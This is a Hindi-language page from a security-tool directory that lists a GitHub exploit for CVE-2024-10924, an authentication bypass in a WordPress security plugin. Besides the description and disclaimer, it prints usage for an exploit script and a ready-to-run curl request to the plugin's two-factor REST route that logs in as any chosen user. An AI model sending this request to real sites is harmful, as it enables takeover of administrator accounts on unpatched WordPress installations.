Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-10924 — CVE-2024-10924 के लिए शोषण, WordPress Really Simple Security प्लगइन (संस्करण 9.0.0-9.1.1.1) में एक गंभीर प्रमाणीकरण बाईपास। दो-कारक प्रमाणीकरण API में एक दोष के माध्यम से अप्रमाणित हमलावरों को किसी भी उपयोगकर्ता के रूप में लॉग इन करने की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/cy3erdr4g0n/cve-2024-10924
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षा
GitHubcy3erdr4g0n/cve-2024-10924

CVE-2024-10924

CVE-2024-10924 के लिए शोषण, WordPress Really Simple Security प्लगइन (संस्करण 9.0.0-9.1.1.1) में एक गंभीर प्रमाणीकरण बाईपास। दो-कारक प्रमाणीकरण API में एक दोष के माध्यम से अप्रमाणित हमलावरों को किसी भी उपयोगकर्ता के रूप में लॉग इन करने की अनुमति देता है।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-10924 (WordPress Really Simple Security प्लगइन - प्रमाणीकरण बाईपास) के लिए एक्सप्लॉइट

📌 अवलोकन

CVE-2024-10924, WordPress के लिए Really Simple Security प्लगइन (संस्करण 9.0.0 से 9.1.1.1) में एक गंभीर प्रमाणीकरण बाईपास भेद्यता है। यह भेद्यता अप्रमाणित हमलावरों को टू-फैक्टर ऑथेंटिकेशन (2FA) API में खामी का फायदा उठाकर किसी भी उपयोगकर्ता (एडमिन सहित) के रूप में लॉग इन करने की अनुमति देती है।

CVE ID: CVE-2024-10924

गंभीरता: 🔥 गंभीर (CVSS 9.8)

प्रभावित संस्करण: Really Simple Security 9.0.0 – 9.1.1.1

पैच किया गया संस्करण: 9.1.2

एक्सप्लॉइट प्रकार: प्रमाणीकरण बाईपास

⚠️ अस्वीकरण

🚨 यह एक्सप्लॉइट केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है।

जिन सिस्टमों के आप स्वामी नहीं हैं, उन पर अनधिकृत उपयोग अवैध है। इसका उद्देश्य सुरक्षा पेशेवरों को कमजोर सिस्टमों का परीक्षण और पैच करने में मदद करना है।

🔧 आवश्यकताएँ

Really Simple Security प्लगइन का एक कमजोर संस्करण चलाने वाली WordPress साइट। परीक्षण के लिए Python 3.x या cURL स्थापित हो। लक्ष्य WordPress व्यवस्थापक उपयोगकर्ता नाम (उपयोगकर्ता गणना आवश्यक हो सकती है)।

स्क्रिप्ट चलाएँ:

python3 exploit.py <url example : http://target.com> <user_id>

मैन्युअली कर्ल के साथ

curl --request POST "http://{url}/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding" -H "Content-Type: application/json" -d '{"user_id": 1, "login_nonce": "invalid_nonce"}' -v

टूल डाउनलोड करें